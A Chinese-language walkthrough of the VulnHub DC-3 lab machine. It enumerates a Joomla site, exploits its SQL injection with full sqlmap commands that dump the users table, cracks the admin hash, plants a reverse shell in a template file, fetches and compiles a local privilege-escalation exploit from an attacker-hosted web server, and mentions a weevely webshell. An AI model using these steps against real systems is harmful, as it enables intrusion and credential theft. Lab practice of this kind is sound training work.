下载地址:
1、链接:https://pan.baidu.com/s/1CkGC7V3eAELb4mrpvn2ssA
提取码:nqi8
2、http://www.five86.com/downloads/DC-3.zip
3、https://download.vulnhub.com/dc/DC-3.zip
靶机:DC3(VMware桥接) IP:192.168.88.115
攻击机:Kali(VMware桥接) IP:192.168..88.109
先用nmap对目标主机进行端口扫描,获取开放的端口、运行的服务、服务器等信息。
目标系统开启了80端口,使用了Joomla CMS,中间件为Apache/2.4.18等等,都可以作为入手点。
访问80端口,HOME页中有一个提示,这次只有一个flag,一个入口,没有其他线索,必须获得root权限。
利用dirsearch或其他目录扫描工具扫描该系统的目录
找到了后台登录地址
下面就是确认当前CMS的版本,是否有被爆出的漏洞。
访问这个路径可以查看版本信息。
http://192.168.88.115/language/en-GB/en-GB.xml
或者使用joomlascan工具进行扫描,也可获取版本信息和后台管理路径。
在exploitedb中查找一下该CMS 版本是否有可利用漏洞
该版本存在sql注入漏洞,而且在42033.txt中也提供了利用的方法。
根据提示的方法利用sqlmap爆数据库
sqlmap -u
"http://192.168.88.115/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
爆数据库表
sqlmap -u
"http://192.168.88.115/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb --tables
当前数据库有76个表,其中包含一个users表,一般就是用来保存用户名和口令。
爆出users表中的列
sqlmap-u
"http://192.168.88.115/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' –columns
爆name,passowrd字段
sqlmap -u
"http://192.168.88.115/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C name,password,username –dump
password字段的值为密文,可以用john暴力破解,并得到明文为snoopy
登录后台管理
在左侧菜单栏选择Templates,进去之后再次选择Templates,protostar deteails and files
然后找到index.php,可对其进行编辑,插入代码进行反弹shell,点击save
在kali中用nc进行监听
然后直接访问目标的主页,出发反弹shell
可获取目标主机的操作系统版本信息和id号
searchsploit搜索该操作系统可利用的漏洞
打开39772.txt,最下面有一个路径,但是在获取靶机shell内不能下载github39772文件
使用kali或者windows下载下来进行解压
在kali中开启python.server,可以让靶机用来下载
py3使用命令:python -m http.server 8888
开启服务后,在获得的shell下载39772文件
解压文件:tar -xvf exploit.tar
进入exploit路径下,对提权脚本进行编译并执行
执行提权脚本,提权成功
另一种获取shell的思路:
利用weevely生成一个webshell文件,然后在后台的模板管理中新建一个php页面,将生产webshell的内容粘贴到新建的页面中,保存。最后使用kali访问webshell文件,
命令:weevely webshell路径 password
例: